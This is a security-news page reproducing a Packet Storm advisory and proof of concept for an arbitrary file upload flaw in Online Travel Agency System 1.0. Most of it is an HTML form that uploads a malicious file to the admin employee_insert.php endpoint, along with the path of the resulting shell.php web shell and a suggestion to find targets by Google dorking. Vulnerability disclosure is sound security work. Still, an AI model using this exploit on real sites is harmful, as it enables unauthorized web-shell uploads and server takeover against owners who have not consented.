Security
Headlines
HeadlinesLatestCVEs

Headline

Online Travel Agency System 1.0 Arbitrary File Upload

Online Travel Agency System version 1.0 suffers from an arbitrary file upload vulnerability.

Packet Storm
#vulnerability#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : Online Travel Agency System v1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/online-travel-agency-system-using-php.html |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply .

[+] infected file : http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php.

[+] save code as poc.html .

<!DOCTYPE html>
<html>
<head>
<title>Employee Form</title>
</head>
<body>
<h2>Employee Form</h2>
<form action="http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php" method="post" enctype="multipart/form-data">
<label for="userfile">Profile Picture:</label>
<input type="file" id="userfile" name="userfile" required><br><br>

    <input type="submit" name="employeeform" value="Submit">  
</form>  

</body>
</html>

[+] http://127.0.0.1/php-travel-agency-system-master/admin/user/shell.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution